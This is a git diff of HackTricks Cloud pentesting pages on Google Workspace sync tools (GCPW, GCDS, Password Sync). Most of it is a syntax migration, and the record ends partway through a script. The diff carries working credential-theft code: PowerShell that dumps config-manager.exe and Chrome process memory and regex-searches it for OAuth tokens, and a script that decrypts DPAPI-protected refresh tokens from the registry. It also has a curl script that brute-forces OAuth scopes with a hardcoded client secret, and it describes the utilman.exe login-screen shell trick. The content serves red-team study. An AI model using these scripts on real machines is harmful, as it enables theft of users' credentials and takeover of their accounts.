- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Google Groups Privesc @@ -28,9 +15,9 @@ If you managed to **compromise a google user session**, from [**https://groups.g ## GCP <--> GWS Pivoting -{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %} -[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/) -{% endcontent-ref %} +{{#ref}} +../gcp-security/gcp-to-workspace-pivoting/ +{{#endref}} ## Takeout - Download Everything Google Knows about an account @@ -42,7 +29,7 @@ If an organization has **Google Vault enabled**, you might be able to access [** ## Contacts download -From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user. +From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es&tab=mC) you can download all the **contacts** of the user. ## Cloudsearch @@ -62,8 +49,8 @@ For sake of simplicity, most of the people will generate and share a link instea Some proposed ways to find all the documents: -* Search in internal chat, forums... -* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser) +- Search in internal chat, forums... +- **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser) ## **Keep Notes** 
@@ -81,20 +68,7 @@ You can also find emails by searching through all the user's invoices in [**http ## References -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? +- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic +- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md new file mode 100644 index 000000000..30dd96b90 --- /dev/null +++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md 
@@ -0,0 +1,58 @@ +# GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID) + +{{#include ../../../banners/hacktricks-training.md}} + +## GCPW - Google Credential Provider for Windows + +This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**. + +> [!TIP] +> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**. + +Find more information about this in: + +{{#ref}} +gcpw-google-credential-provider-for-windows.md +{{#endref}} + +## GCSD - Google Cloud Directory Sync + +This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing). + +It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. + +> [!TIP] +> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**. + +Find more information about this in: + +{{#ref}} +gcds-google-cloud-directory-sync.md +{{#endref}} + +## GPS - Google Password Sync + +This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google. 
+ +It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running). + +> [!TIP] +> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**. + +Find more information about this in: + +{{#ref}} +gps-google-password-sync.md +{{#endref}} + +## Admin Directory Sync + +The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). + +Find more information about this in: + +{{#ref}} +gws-admin-directory-sync.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md similarity index 65% rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md index a2f5e0f0e..47a7a9468 100644 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md 
+++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md @@ -1,19 +1,6 @@ # GCDS - Google Cloud Directory Sync -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -21,17 +8,15 @@ This is a tool that can be used to **sync your active directory users and groups It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. -{% hint style="info" %} -To perform a **MitM** to the **`config-manager.exe`** binary just add the following line in the `config.manager.vmoptions` file: **`-Dcom.sun.net.ssl.checkRevocation=false`** -{% endhint %} +> [!NOTE] +> To perform a **MitM** to the **`config-manager.exe`** binary just add the following line in the `config.manager.vmoptions` file: **`-Dcom.sun.net.ssl.checkRevocation=false`** -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} +> [!TIP] +> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**. Also note that GCDS won't synchronize passwords from AD to Workspace. If something it'll just generate random passwords for newly created users in Workspace as you can see in the following image: -
+
### GCDS - Disk Tokens & AD Credentials @@ -168,9 +153,8 @@ Write-Host "Decrypted Password: $decryptedPassword" -{% hint style="info" %} -Note that it's possible to check this information checking the java code of **`DirSync.jar`** from **`C:\Program Files\Google Cloud Directory Sync`** searching for the string `exportkeys` (as thats the cli param that the binary `upgrade-config.exe` expects to dump the keys). -{% endhint %} +> [!NOTE] +> Note that it's possible to check this information checking the java code of **`DirSync.jar`** from **`C:\Program Files\Google Cloud Directory Sync`** searching for the string `exportkeys` (as thats the cli param that the binary `upgrade-config.exe` expects to dump the keys). Instead of using the powershell script, it's also possible to use the binary **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** with the param `-exportKeys` and get the **Key** and **IV** from the registry in hex and then just use some cyberchef with AES/CBC and that key and IV to decrypt the info. 
@@ -184,74 +168,74 @@ I guess you could also find the AD configured credentials. Dump config-manager.exe processes and search tokens ```powershell -# Define paths for Procdump and Strings utilities -$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe" -$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe" -$dumpFolder = "C:\Users\Public\dumps" - -# Regular expressions for tokens -$tokenRegexes = @( - "ya29\.[a-zA-Z0-9_\.\-]{50,}", - "1//[a-zA-Z0-9_\.\-]{50,}" +# Define paths for Procdump and Strings utilities +$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe" +$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe" +$dumpFolder = "C:\Users\Public\dumps" + +# Regular expressions for tokens +$tokenRegexes = @( + "ya29\.[a-zA-Z0-9_\.\-]{50,}", + "1//[a-zA-Z0-9_\.\-]{50,}" ) - -# Create a directory for the dumps if it doesn't exist -if (!(Test-Path $dumpFolder)) { - New-Item -Path $dumpFolder -ItemType Directory -} - -# Get all Chrome process IDs -$chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id - -# Dump each Chrome process -foreach ($processId in $chromeProcesses) { - Write-Output "Dumping process with PID: $processId" - & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" -} - -# Extract strings and search for tokens in each dump -Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { - $dumpFile = $_.FullName - $baseName = $_.BaseName - $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt" - $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt" - - Write-Output "Extracting strings from $dumpFile" - & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile - & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile - - $outputFiles = @($asciiStringsFile, $unicodeStringsFile) - - foreach 
($file in $outputFiles) { - foreach ($regex in $tokenRegexes) { - - $matches = Select-String -Path $file -Pattern $regex -AllMatches - - $uniqueMatches = @{} - - foreach ($matchInfo in $matches) { - foreach ($match in $matchInfo.Matches) { - $matchValue = $match.Value - if (-not $uniqueMatches.ContainsKey($matchValue)) { - $uniqueMatches[$matchValue] = @{ - LineNumber = $matchInfo.LineNumber - LineText = $matchInfo.Line.Trim() - FilePath = $matchInfo.Path - } - } - } - } - - foreach ($matchValue in $uniqueMatches.Keys) { - $info = $uniqueMatches[$matchValue] - Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" - } - } - - Write-Output "" - } -} - + +# Create a directory for the dumps if it doesn't exist +if (!(Test-Path $dumpFolder)) { + New-Item -Path $dumpFolder -ItemType Directory +} + +# Get all Chrome process IDs +$chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id + +# Dump each Chrome process +foreach ($processId in $chromeProcesses) { + Write-Output "Dumping process with PID: $processId" + & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" +} + +# Extract strings and search for tokens in each dump +Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { + $dumpFile = $_.FullName + $baseName = $_.BaseName + $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt" + $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt" + + Write-Output "Extracting strings from $dumpFile" + & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile + & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile + + $outputFiles = @($asciiStringsFile, $unicodeStringsFile) + + foreach ($file in $outputFiles) { + foreach ($regex in $tokenRegexes) { + + $matches = Select-String -Path $file -Pattern $regex -AllMatches + + $uniqueMatches = @{} + + foreach ($matchInfo in $matches) { + 
foreach ($match in $matchInfo.Matches) { + $matchValue = $match.Value + if (-not $uniqueMatches.ContainsKey($matchValue)) { + $uniqueMatches[$matchValue] = @{ + LineNumber = $matchInfo.LineNumber + LineText = $matchInfo.Line.Trim() + FilePath = $matchInfo.Path + } + } + } + } + + foreach ($matchValue in $uniqueMatches.Keys) { + $info = $uniqueMatches[$matchValue] + Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" + } + } + + Write-Output "" + } +} + Remove-Item -Path $dumpFolder -Recurse -Force ``` @@ -271,11 +255,10 @@ curl -s --data "client_id=118556098869.apps.googleusercontent.com" \ ### GCDS - Scopes -{% hint style="info" %} -Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**. - -Also, the refresh token is not valid in every application. -{% endhint %} +> [!NOTE] +> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**. +> +> Also, the refresh token is not valid in every application. By default GCSD won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`: 
@@ -284,7 +267,7 @@ By default GCSD won't have access as the user to every possible OAuth scope, so Bash script to brute-force scopes ```bash -curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do +curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do echo -ne "Testing $scope \r" if ! curl -s --data "client_id=118556098869.apps.googleusercontent.com" \ --data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \ @@ -351,21 +334,7 @@ curl -X POST \ # You could also change the password of a user for example ``` -{% hint style="danger" %} -It's not possible to give the new user the Super Amin role because the **refresh token doesn't have enough scopes** to give the required privileges. -{% endhint %} +> [!CAUTION] +> It's not possible to give the new user the Super Amin role because the **refresh token doesn't have enough scopes** to give the required privileges. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md similarity index 80% rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md index 5e62c0b1e..8a7623ba3 100644 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md +++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md @@ -1,33 +1,18 @@ # GCPW - Google Credential Provider for Windows -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store tokens to access Google Workspace in some places in the PC. -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**. -{% endhint %} +> [!TIP] +> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**. ### GCPW - MitM When a user access a Windows PC synchronized with Google Workspace via GCPW it will need to complete a common login form. This login form will return an OAuth code that the PC will exchange for the refresh token in a request like: -{% code overflow="wrap" %} ```http POST /oauth2/v4/token HTTP/2 Host: www.googleapis.com 
@@ -43,16 +28,14 @@ scope=https://www.google.com/accounts/OAuthLogin &device_id=d5c82f70-71ff-48e8-94db-312e64c7354f &device_type=chrome ``` -{% endcode %} New lines have been added to make it more readable. -{% hint style="info" %} -It was possible to perform a MitM by installing `Proxifier` in the PC, overwriting the `utilman.exe` binary with a `cmd.exe` and executing the **accessibility features** in the Windows login page, which will execute a **CMD** from which you can **launch and configure the Proxifier**.\ -Don't forget to **block QUICK UDP** traffic in `Proxifier` so it downgrades to TCP communication and you can see it. - -Also configure in "Serviced and other users" both options and install the Burp CA cert in the Windows. -{% endhint %} +> [!NOTE] +> It was possible to perform a MitM by installing `Proxifier` in the PC, overwriting the `utilman.exe` binary with a `cmd.exe` and executing the **accessibility features** in the Windows login page, which will execute a **CMD** from which you can **launch and configure the Proxifier**.\ +> Don't forget to **block QUICK UDP** traffic in `Proxifier` so it downgrades to TCP communication and you can see it. +> +> Also configure in "Serviced and other users" both options and install the Burp CA cert in the Windows. Moreover adding the keys `enable_verbose_logging = 1` and `log_file_path = C:\Public\gcpw.log` in **`HKLM:\SOFTWARE\Google\GCPW`** it's possible to make it store some logs. 
@@ -89,42 +72,37 @@ In **`HKCU:\SOFTWARE\Google\Accounts`** it's possible to access the email of the In **`HKLM:\SOFTWARE\Google\GCPW\Users`** it's possible to find the **domains** that are allowed to login in the key `domains_allowed` and in subkeys it's possible to find information about the user like email, pic, user name, token lifetimes, token handle... -{% hint style="info" %} -The token handle is a token that starts with `eth.` and from which can be extracted some info with a request like: - -{% code overflow="wrap" %} -```bash -curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \ - -d 'token_handle=eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg' -# Example response -{ - "audience": "77185425430.apps.googleusercontent.com", - "scope": "https://www.google.com/accounts/OAuthLogin", - "expires_in": 12880152 -} -``` -{% endcode %} - -Also it's possible to find the token handle of an access token with a request like: - -{% code overflow="wrap" %} -```bash -curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \ - -d 'access_token=' -# Example response -{ - "issued_to": "77185425430.apps.googleusercontent.com", - "audience": "77185425430.apps.googleusercontent.com", - "scope": "https://www.google.com/accounts/OAuthLogin", - "expires_in": 1327, - "access_type": "offline", - "token_handle": "eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg" -} -``` -{% endcode %} - -Afaik it's not possible obtain a refresh token or access token from the token handle. 
-{% endhint %} +> [!NOTE] +> The token handle is a token that starts with `eth.` and from which can be extracted some info with a request like: +> +> ```bash +> curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \ +> -d 'token_handle=eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg' +> # Example response +> { +> "audience": "77185425430.apps.googleusercontent.com", +> "scope": "https://www.google.com/accounts/OAuthLogin", +> "expires_in": 12880152 +> } +> ``` +> +> Also it's possible to find the token handle of an access token with a request like: +> +> ```bash +> curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \ +> -d 'access_token=' +> # Example response +> { +> "issued_to": "77185425430.apps.googleusercontent.com", +> "audience": "77185425430.apps.googleusercontent.com", +> "scope": "https://www.google.com/accounts/OAuthLogin", +> "expires_in": 1327, +> "access_type": "offline", +> "token_handle": "eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg" +> } +> ``` +> +> Afaik it's not possible obtain a refresh token or access token from the token handle. Moreover, the file **`C:\ProgramData\Google\Credential Provider\Policies\\PolicyFetchResponse`** is a json containing the information of different **settings** like `enableDmEnrollment`, `enableGcpAutoUpdate`, `enableMultiUserLogin` (if several users from Workspace can login in the computer) and `validityPeriodDays` (number of days a user doesn't need to reauthenticate with Google directly). 
@@ -166,7 +144,7 @@ function Get-RegistryKeysAndDecryptTokens { # Decrypt the bytes using ProtectedData.Unprotect $decryptedTokenBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedTokenBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) $decryptedToken = [System.Text.Encoding]::UTF8.GetString($decryptedTokenBytes) - + Write-Output "Path: $keyPath" Write-Output "Decrypted refresh_token: $decryptedToken" Write-Output "-----------------------------" @@ -193,11 +171,9 @@ Get-RegistryKeysAndDecryptTokens -keyPath $baseKey Example out: -{% code overflow="wrap" %} ``` Path: Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\SOFTWARE\Google\Accounts\100402336966965820570Decrypted refresh_token: 1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI ``` -{% endcode %} As explained in [**this video**](https://www.youtube.com/watch?v=FEQxHRRP_5I), if you don't find the token in the registry it's possible to modify the value (or delete) from **`HKLM:\SOFTWARE\Google\GCPW\Users\\th`** and the next time the user access the computer he will need to login again and the **token will be stored in the previous registry**. 
@@ -205,12 +181,12 @@ As explained in [**this video**](https://www.youtube.com/watch?v=FEQxHRRP_5I), i The file **`%LocalAppData%\Google\Chrome\User Data\Local State`** stores the key to decrypt the **`refresh_tokens`** located inside the **Google Chrome profiles** of the user like: -* `%LocalAppData%\Google\Chrome\User Data\Default\Web Data` -* `%LocalAppData%\Google\Chrome\Profile*\Default\Web Data` +- `%LocalAppData%\Google\Chrome\User Data\Default\Web Data` +- `%LocalAppData%\Google\Chrome\Profile*\Default\Web Data` It's possible to find some **C# code** accessing these tokens in their decrypted manner in [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe). -Moreover, the encrypting can be found in this code: [https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os\_crypt/sync/os\_crypt\_win.cc#L216](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216) +Moreover, the encrypting can be found in this code: [https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216) It can be observed that AESGCM is used, the encrypted token starts with a **version** (**`v10`** at this time), then it [**has 12B of nonce**](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L42), and then it has the **cypher-text** with a final **mac of 16B**. 
@@ -223,74 +199,74 @@ The following script can be used to **dump** every **Chrome** process using `pro Dump Chrome processes and search tokens ```powershell -# Define paths for Procdump and Strings utilities -$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe" -$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe" -$dumpFolder = "C:\Users\Public\dumps" - -# Regular expressions for tokens -$tokenRegexes = @( - "ya29\.[a-zA-Z0-9_\.\-]{50,}", - "1//[a-zA-Z0-9_\.\-]{50,}" +# Define paths for Procdump and Strings utilities +$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe" +$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe" +$dumpFolder = "C:\Users\Public\dumps" + +# Regular expressions for tokens +$tokenRegexes = @( + "ya29\.[a-zA-Z0-9_\.\-]{50,}", + "1//[a-zA-Z0-9_\.\-]{50,}" ) - -# Create a directory for the dumps if it doesn't exist -if (!(Test-Path $dumpFolder)) { - New-Item -Path $dumpFolder -ItemType Directory -} - -# Get all Chrome process IDs -$chromeProcesses = Get-Process -Name "chrome" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id - -# Dump each Chrome process -foreach ($processId in $chromeProcesses) { - Write-Output "Dumping process with PID: $processId" - & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" -} - -# Extract strings and search for tokens in each dump -Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { - $dumpFile = $_.FullName - $baseName = $_.BaseName - $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt" - $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt" - - Write-Output "Extracting strings from $dumpFile" - & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile - & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile - - $outputFiles = @($asciiStringsFile, $unicodeStringsFile) - - foreach 
($file in $outputFiles) { - foreach ($regex in $tokenRegexes) { - - $matches = Select-String -Path $file -Pattern $regex -AllMatches - - $uniqueMatches = @{} - - foreach ($matchInfo in $matches) { - foreach ($match in $matchInfo.Matches) { - $matchValue = $match.Value - if (-not $uniqueMatches.ContainsKey($matchValue)) { - $uniqueMatches[$matchValue] = @{ - LineNumber = $matchInfo.LineNumber - LineText = $matchInfo.Line.Trim() - FilePath = $matchInfo.Path - } - } - } - } - - foreach ($matchValue in $uniqueMatches.Keys) { - $info = $uniqueMatches[$matchValue] - Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" - } - } - - Write-Output "" - } -} - + +# Create a directory for the dumps if it doesn't exist +if (!(Test-Path $dumpFolder)) { + New-Item -Path $dumpFolder -ItemType Directory +} + +# Get all Chrome process IDs +$chromeProcesses = Get-Process -Name "chrome" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id + +# Dump each Chrome process +foreach 